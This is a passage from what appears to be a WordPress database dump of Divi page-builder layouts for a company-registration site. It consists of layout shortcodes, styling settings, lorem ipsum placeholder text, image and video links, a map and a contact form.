border_color=\"#ffffff\" border_style=\"solid\"]\n\n<p>Sed ut perspiciatis unde omnis iste nat errorae  sit voluptatem acusa estum doloremque nor laudantium, tom rem. Consect edipi au lorem orestem.</p>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"on\" width_unit=\"on\" custom_width_px=\"980px\" use_custom_gutter=\"on\" gutter_width=\"2\" custom_padding=\"60px||140px|\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" column_padding_mobile=\"on\" custom_padding_tablet=\"30px||110px|\" custom_padding_last_edited=\"on|desktop\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" parallax_3=\"off\" parallax_method_3=\"off\"][et_pb_column type=\"1_3\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/05.png\" show_in_lightbox=\"off\" url_new_window=\"off\" animation=\"fade_in\" sticky=\"off\" align=\"center\" force_fullwidth=\"off\" always_center_on_mobile=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"||23px|\"]\n\n\n\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_font=\"Source Sans Pro|on|||\" text_font_size=\"20\" text_text_color=\"#ffffff\" custom_margin=\"||16px|\"]\n\n<p>LOREM IPSUM</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Source Sans Pro Light||||\" text_font_size=\"18\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\n\n<p>Sed ut perspiciatis unde omnis iste nat errorae  sit voluptatem acusa estum doloremque nor laudantium, tom rem. Consect edipi au lorem orestem.</p>\n\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/06.png\" show_in_lightbox=\"off\" url_new_window=\"off\" animation=\"fade_in\" sticky=\"off\" align=\"center\" force_fullwidth=\"off\" always_center_on_mobile=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"||23px|\"]\n\n\n\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_font=\"Source Sans Pro|on|||\" text_font_size=\"20\" text_text_color=\"#ffffff\" custom_margin=\"||16px|\"]\n\n<p>LOREM IPSUM</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Source Sans Pro Light||||\" text_font_size=\"18\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\n\n<p>Sed ut perspiciatis unde omnis iste nat errorae  sit voluptatem acusa estum doloremque nor laudantium, tom rem. Consect edipi au lorem orestem.</p>\n\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/071.png\" show_in_lightbox=\"off\" url_new_window=\"off\" animation=\"fade_in\" sticky=\"off\" align=\"center\" force_fullwidth=\"off\" always_center_on_mobile=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"||23px|\"]\n\n\n\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_font=\"Source Sans Pro|on|||\" text_font_size=\"20\" text_text_color=\"#ffffff\" custom_margin=\"||16px|\"]\n\n<p>LOREM IPSUM</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Source Sans Pro Light||||\" text_font_size=\"18\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\n\n<p>Sed ut perspiciatis unde omnis iste nat errorae  sit voluptatem acusa estum doloremque nor laudantium, tom rem. Consect edipi au lorem orestem.</p>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section admin_label=\"Section\" fullwidth=\"off\" specialty=\"off\" transparent_background=\"off\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" custom_padding=\"0px|0px\" padding_mobile=\"on\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"on\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" custom_padding=\"0px|0px\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" column_padding_mobile=\"on\"][et_pb_column type=\"4_4\"][et_pb_video admin_label=\"Video\" src=\"https://www.youtube.com/watch?v=b337Rv8fXe0\" image_src=\"https://companyregistration.online/wp-content/uploads/2016/07/081.jpg\"]\n\n\n\n[/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section admin_label=\"Section\" fullwidth=\"off\" specialty=\"off\" transparent_background=\"off\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"off\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" background_color=\"#e87511\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"on\" width_unit=\"on\" custom_width_px=\"980px\" use_custom_gutter=\"off\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" column_padding_mobile=\"on\" custom_padding=\"72px|60px\"][et_pb_column type=\"4_4\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Playfair Display||||\" text_font_size=\"62\" text_text_color=\"#ffffff\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"0px|||\" text_font_size_tablet=\"42\" text_font_size_last_edited=\"on|phone\"]\n\n<p>Do You Have Any Questions?</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" max_width=\"720px\" text_font=\"Source Sans Pro Light||||\" text_font_size=\"24\" text_text_color=\"#ffffff\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"23px|||\"]\n\n<p>Sed ut perspiciatis unde omnis iste natus errorae  sit voluptatem accusa antium doloremque nor laudantium, totam rem. Consect edipi.</p>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"on\" width_unit=\"on\" custom_width_px=\"980px\" use_custom_gutter=\"off\" custom_padding=\"0px|86px\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" column_padding_mobile=\"on\"][et_pb_column type=\"1_2\"][et_pb_toggle admin_label=\"Toggle\" title=\"LOREM IPSUM SIT AMET\" open=\"off\" closed_toggle_background_color=\"rgba(232,232,232,0)\" icon_color=\"#ffffff\" title_font=\"Source Sans Pro|on|||\" title_text_color=\"#ffffff\" title_letter_spacing=\"2px\" body_font=\"Source Sans Pro||||\" body_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" open_toggle_background_color=\"rgba(255,255,255,0)\" custom_css_open_toggle=\"    border-style: solid;||    border-width: 2px;\"]\n\n<p>Duis aute irure dolor in reprehenderit in volup tate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupid atat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum. Lorem ipsum sint occaecat cupid atat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.</p>\n\n[/et_pb_toggle][et_pb_toggle admin_label=\"Toggle\" title=\"PERSIPICITIAS ORESTEM EST\" open=\"off\" closed_toggle_background_color=\"rgba(232,232,232,0)\" icon_color=\"#ffffff\" title_font=\"Source Sans Pro|on|||\" title_text_color=\"#ffffff\" title_letter_spacing=\"2px\" body_font=\"Source Sans Pro||||\" body_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" open_toggle_background_color=\"rgba(255,255,255,0)\"]\n\n<p>Duis aute irure dolor in reprehenderit in volup tate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupid atat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum. Lorem ipsum sint occaecat cupid atat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.</p>\n\n[/et_pb_toggle][et_pb_toggle admin_label=\"Toggle\" title=\"UNDE SET UT\" open=\"off\" closed_toggle_background_color=\"rgba(232,232,232,0)\" icon_color=\"#ffffff\" title_font=\"Source Sans Pro|on|||\" title_text_color=\"#ffffff\" title_letter_spacing=\"2px\" body_font=\"Source Sans Pro||||\" body_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" open_toggle_background_color=\"rgba(255,255,255,0)\"]\n\n<p>Duis aute irure dolor in reprehenderit in volup tate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupid atat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum. Lorem ipsum sint occaecat cupid atat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.</p>\n\n[/et_pb_toggle][/et_pb_column][et_pb_column type=\"1_2\"][et_pb_toggle admin_label=\"Toggle\" title=\"CONSECT EDIPI REM\" open=\"off\" closed_toggle_background_color=\"rgba(232,232,232,0)\" icon_color=\"#ffffff\" title_font=\"Source Sans Pro|on|||\" title_text_color=\"#ffffff\" title_letter_spacing=\"2px\" body_font=\"Source Sans Pro||||\" body_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" open_toggle_background_color=\"rgba(255,255,255,0)\"]\n\n<p>Duis aute irure dolor in reprehenderit in volup tate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupid atat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum. Lorem ipsum sint occaecat cupid atat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.</p>\n\n[/et_pb_toggle][et_pb_toggle admin_label=\"Toggle\" title=\"OMNIS EST NATUS ERORA\" open=\"off\" closed_toggle_background_color=\"rgba(232,232,232,0)\" icon_color=\"#ffffff\" title_font=\"Source Sans Pro|on|||\" title_text_color=\"#ffffff\" title_letter_spacing=\"2px\" body_font=\"Source Sans Pro||||\" body_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" open_toggle_background_color=\"rgba(255,255,255,0)\"]\n\n<p>Duis aute irure dolor in reprehenderit in volup tate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupid atat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum. Lorem ipsum sint occaecat cupid atat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.</p>\n\n[/et_pb_toggle][et_pb_toggle admin_label=\"Toggle\" title=\"ACCUSA ANTUM\" open=\"off\" closed_toggle_background_color=\"rgba(232,232,232,0)\" icon_color=\"#ffffff\" title_font=\"Source Sans Pro|on|||\" title_text_color=\"#ffffff\" title_letter_spacing=\"2px\" body_font=\"Source Sans Pro||||\" body_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" open_toggle_background_color=\"rgba(255,255,255,0)\"]\n\n<p>Duis aute irure dolor in reprehenderit in volup tate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupid atat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum. Lorem ipsum sint occaecat cupid atat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.</p>\n\n[/et_pb_toggle][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section admin_label=\"Section\" fullwidth=\"off\" specialty=\"off\" transparent_background=\"off\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"off\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" background_color=\"#e87511\" background_image=\"https://companyregistration.online/wp-content/uploads/2016/07/09.jpg\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"on\" width_unit=\"on\" custom_width_px=\"980px\" use_custom_gutter=\"off\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" column_padding_mobile=\"on\" custom_padding=\"70px|80px\"][et_pb_column type=\"4_4\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Playfair Display||||\" text_font_size=\"62\" text_text_color=\"#ffffff\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"0px|||\" text_font_size_tablet=\"42\" text_font_size_last_edited=\"on|phone\"]\n\n<p>Our Contacts</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" max_width=\"720px\" text_font=\"Source Sans Pro Light||||\" text_font_size=\"24\" text_text_color=\"#ffffff\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"16px|||\"]\n\n<p>Sed ut perspiciatis unde omnis iste natus errorae  sit voluptatem accusa antium doloremque nor laudantium, totam rem. Consect edipi.</p>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"on\" width_unit=\"on\" custom_width_px=\"980px\" use_custom_gutter=\"off\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" column_padding_mobile=\"on\" custom_padding=\"0px|90px\"][et_pb_column type=\"1_2\"][et_pb_map admin_label=\"Map\" address=\"San Francisco, California, Stati Uniti\" zoom_level=\"13\" address_lat=\"37.76629324719629\" address_lng=\"-122.42214330656816\" mouse_wheel=\"on\" use_grayscale_filter=\"off\"]\n\n[et_pb_map_pin title=\"San Francisco\" pin_address=\"San Francisco, California, Stati Uniti\" pin_address_lat=\"37.7749295\" pin_address_lng=\"-122.41941550000001\"]\n[/et_pb_map_pin]\n\n[/et_pb_map][/et_pb_column][et_pb_column type=\"1_4\"][et_pb_divider admin_label=\"Divider\" color=\"#ffffff\" show_divider=\"off\" height=\"60px\" divider_style=\"solid\" divider_position=\"top\" hide_on_mobile=\"on\"]\n\n\n\n[/et_pb_divider][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/102.png\" show_in_lightbox=\"off\" url_new_window=\"off\" animation=\"fade_in\" sticky=\"off\" align=\"center\" force_fullwidth=\"off\" always_center_on_mobile=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"||23px|\"]\n\n\n\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_font=\"Source Sans Pro|on|||\" text_font_size=\"24\" text_text_color=\"#ffffff\" custom_margin=\"||6px|\"]\n\n<p>0039 3476 1355</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Source Sans Pro Light||||\" text_font_size=\"18\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\n\n<p>info@email.com</p>\n\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\"][et_pb_divider admin_label=\"Divider\" color=\"#ffffff\" show_divider=\"off\" height=\"60px\" divider_style=\"solid\" divider_position=\"top\" hide_on_mobile=\"on\"]\n\n\n\n[/et_pb_divider][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/113.png\" show_in_lightbox=\"off\" url_new_window=\"off\" animation=\"fade_in\" sticky=\"off\" align=\"center\" force_fullwidth=\"off\" always_center_on_mobile=\"off\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"||23px|\"]\n\n\n\n[/et_pb_image][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Source Sans Pro Light||||\" text_font_size=\"18\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\"]\n\n<p>San Francisco. Address: 350 Fifth Avenue, 34th floor.</p>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Homepage #2','','publish','closed','closed','','homepage-2','','','2016-03-31 17:59:47','2016-03-31 15:59:47','',0,'https://companyregistration.online/et_pb_layout/homepage-2/',0,'et_pb_layout','',0),(3369,1,'2016-03-31 19:28:09','2016-03-31 17:28:09','[et_pb_section admin_label=\"Section\" fullwidth=\"off\" specialty=\"off\" background_image=\"https://companyregistration.online/wp-content/uploads/2016/07/0113.jpg\" transparent_background=\"off\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"off\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" background_color=\"#ffffff\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"on\" width_unit=\"on\" custom_width_px=\"980px\" use_custom_gutter=\"off\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" column_padding_mobile=\"on\" custom_padding=\"12em||0px|\" parallax_1=\"off\" parallax_method_1=\"off\" custom_padding_tablet=\"6em||0px|\" custom_padding_last_edited=\"on|tablet\"][et_pb_column type=\"4_4\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Raleway|on|||\" text_font_size=\"12em\" text_text_color=\"#ffffff\" text_line_height=\"1em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"||9px|\" text_font_size_tablet=\"4em\" text_font_size_last_edited=\"on|phone\"]\n\n<p>\nbe linked</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" max_width=\"860px\" text_font=\"Source Sans Pro Light||||\" text_font_size=\"36\" text_text_color=\"#ffffff\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_font_size_tablet=\"26\" text_font_size_last_edited=\"on|phone\"]\n\n<p>\nLorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore.</p>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"on\" width_unit=\"on\" custom_width_px=\"320px\" use_custom_gutter=\"off\" custom_padding=\"44px||12em|\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\" custom_padding_tablet=\"44px||6em|\" custom_padding_last_edited=\"on|tablet\"][et_pb_column type=\"4_4\"][et_pb_contact_form admin_label=\"Contact Form\" captcha=\"off\" use_redirect=\"off\" form_background_color=\"#ffffff\" input_border_radius=\"6\" title_text_color=\"#666666\" form_field_text_color=\"#666666\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_button=\"on\" button_text_color=\"#ffffff\" button_bg_color=\"#d94b6a\" button_border_color=\"#d94b6a\" button_letter_spacing=\"2\" button_use_icon=\"default\" button_icon_placement=\"right\" button_on_hover=\"on\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"#d86a82\" button_border_color_hover=\"#d86a82\" button_letter_spacing_hover=\"3\" custom_css_contact_button=\"width:320px;||margin-top:7px;\" title_font=\"Source Sans Pro Light||||\" title_font_size=\"20\" form_field_font=\"Source Sans Pro||||\" form_field_font_size=\"20\" button_border_width=\"4\" button_border_radius=\"6\" button_font=\"Source Sans Pro||||\" button_border_radius_hover=\"6\" disabled=\"off\" disabled_on=\"off|off|\" title_font_size_last_edited=\"on|phone\" form_field_font_size_last_edited=\"on|phone\" button_letter_spacing_last_edited=\"on|desktop\" button_letter_spacing_hover_last_edited=\"on|phone\"]\n\n[et_pb_contact_field field_title=\"Name\" field_type=\"input\" field_id=\"Name\" required_mark=\"on\" fullwidth_field=\"on\" form_field_font_select=\"default\" form_field_font=\"||||\" form_field_font_size_tablet=\"20\" form_field_font_size_phone=\"20\" form_field_letter_spacing_tablet=\"0px\" form_field_letter_spacing_phone=\"0px\" form_field_line_height_tablet=\"1.7em\" form_field_line_height_phone=\"1.7em\" use_border_color=\"off\" border_style=\"solid\" form_field_font_size_last_edited=\"on|desktop\" form_field_letter_spacing_last_edited=\"on|desktop\" form_field_line_height_last_edited=\"on|phone\"]\n[/et_pb_contact_field][et_pb_contact_field field_title=\"Email Address\" field_type=\"email\" field_id=\"Email\" required_mark=\"on\" fullwidth_field=\"on\" form_field_font_select=\"default\" form_field_font=\"||||\" form_field_font_size_tablet=\"20\" form_field_font_size_phone=\"20\" form_field_letter_spacing_tablet=\"0px\" form_field_letter_spacing_phone=\"0px\" form_field_line_height_tablet=\"1.7em\" form_field_line_height_phone=\"1.7em\" use_border_color=\"off\" border_style=\"solid\" form_field_font_size_last_edited=\"on|desktop\" form_field_letter_spacing_last_edited=\"on|phone\" form_field_line_height_last_edited=\"on|phone\"]\n[/et_pb_contact_field]\n\n[/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section admin_label=\"Section\" fullwidth=\"off\" specialty=\"off\" transparent_background=\"off\" background_color=\"#d94b6a\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" custom_padding=\"0px|0px\" padding_mobile=\"on\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"on\" width_unit=\"on\" custom_width_px=\"980px\" use_custom_gutter=\"on\" gutter_width=\"2\" custom_padding=\"128px||64px|\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" column_padding_mobile=\"on\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\"][et_pb_column type=\"1_2\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Playfair Display||||\" text_font_size=\"42px\" text_text_color=\"#ffffff\" text_line_height=\"1.3em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"||80px|\" text_font_size_last_edited=\"on|tablet\"]\n\n<p>Introduction.<br />Advanced Features.<br /><em>Human Support.</em></p>\n\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_font=\"Source Sans Pro Light||||\" text_font_size=\"20\" text_text_color=\"#ffffff\" custom_margin=\"||80px|\"]\n\n<p><img style=\"float: left;clear:left;margin-top:8%;margin-bottom:8%;margin-right:7%\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/022.png\" alt=\"02\" width=\"70\" height=\"64\" class=\"alignnone size-full wp-image-1093\">\n</p>\n<div>\n<p><strong>LOREM IPSUM</strong></p>\n<p>Sed ut perspiciatis unde omnis iste au natus errorae  sit voluptatem accusa au mesantium doloremque nor laudantium, totam astrem. Consect au lorem ipsum edipi.</p>\n</div>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_font=\"Source Sans Pro Light||||\" text_font_size=\"20\" text_text_color=\"#ffffff\" custom_margin=\"||80px|\"]\n\n<p><img style=\"float: left;clear:left;margin-top:8%;margin-bottom:8%;margin-right:7%\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/033.png\" alt=\"03\" width=\"75\" height=\"75\" class=\"alignnone size-full wp-image-1108\"></p>\n<div>\n<p><strong>LOREM IPSUM</strong></p>\n<p>Sed ut perspiciatis unde omnis iste au natus errorae  sit voluptatem accusa au mesantium doloremque nor laudantium, totam astrem. Consect au lorem ipsum edipi.</p>\n</div>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_font=\"Source Sans Pro Light||||\" text_font_size=\"20\" text_text_color=\"#ffffff\" custom_margin=\"||80px|\"]\n\n<p><img class=\"alignnone size-full wp-image-1108\" style=\"float: left;clear: left;margin-top: 6%;margin-bottom: 6%;margin-right: 7%\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/044.png\" alt=\"04\" width=\"75\" height=\"102\"></p>\n<div>\n<p><strong>LOREM IPSUM</strong></p>\n<p>Sed ut perspiciatis unde omnis iste au natus errorae sit voluptatem accusa au mesantium doloremque nor laudantium, totam astrem. Consect au lorem ipsum edipi.</p>\n</div>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section admin_label=\"Section\" fullwidth=\"off\" specialty=\"off\" background_image=\"https://companyregistration.online/wp-content/uploads/2016/07/0210.jpg\" transparent_background=\"off\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"off\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" background_color=\"#ffffff\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"on\" width_unit=\"on\" custom_width_px=\"980px\" use_custom_gutter=\"off\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" column_padding_mobile=\"on\" custom_padding=\"74px|0px\"][et_pb_column type=\"4_4\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" text_font=\"Playfair Display||||\" text_font_size=\"62\" text_text_color=\"#ffffff\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"0px|||\" text_font_size_tablet=\"42px\" text_font_size_last_edited=\"on|tablet\"]\n\n<p>The Video Presentation</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"center\" max_width=\"720px\" text_font=\"Source Sans Pro Light||||\" text_font_size=\"24\" text_text_color=\"#ffffff\" text_line_height=\"1.2em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"20px|||\"]\n\n<p>Sed ut perspiciatis unde omnis iste natus errorae  sit voluptatem accusa antium doloremque nor laudantium, totam rem. Consect edipi.</p>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"on\" width_unit=\"on\" custom_width_px=\"460px\" use_custom_gutter=\"off\" custom_padding=\"80px|60px\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" column_padding_mobile=\"on\"][et_pb_column type=\"4_4\"][et_pb_video admin_label=\"Video\" src=\"https://www.youtube.com/watch?v=ZE4nW5fS0eM\" image_src=\"https://companyregistration.online/wp-content/uploads/2016/07/03.png\" play_icon_color=\"#ffffff\"]\n\n\n\n[/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section admin_label=\"Section\" fullwidth=\"off\" specialty=\"off\" transparent_background=\"off\" background_color=\"#ffffff\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" custom_padding=\"0px|0px\" padding_mobile=\"on\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"on\" width_unit=\"on\" custom_width_px=\"980px\" use_custom_gutter=\"on\" gutter_width=\"2\" custom_padding=\"140px||82px|\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" column_padding_mobile=\"on\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\"][et_pb_column type=\"1_2\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Playfair Display||||\" text_font_size=\"62\" text_text_color=\"#333333\" text_line_height=\"1.3em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"||20px|\" text_font_size_tablet=\"42px\" text_font_size_last_edited=\"on|tablet\"]\n\n<p>Our Gallery</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_font=\"Source Sans Pro||||\" text_font_size=\"20\" text_text_color=\"#888888\" custom_margin=\"||27px|\" text_line_height=\"1.4em\"]\n\n<p>Lorem ipsum dolor sit amet, me consectetur adipis elit, sed do eius mod au est tempor incint ut 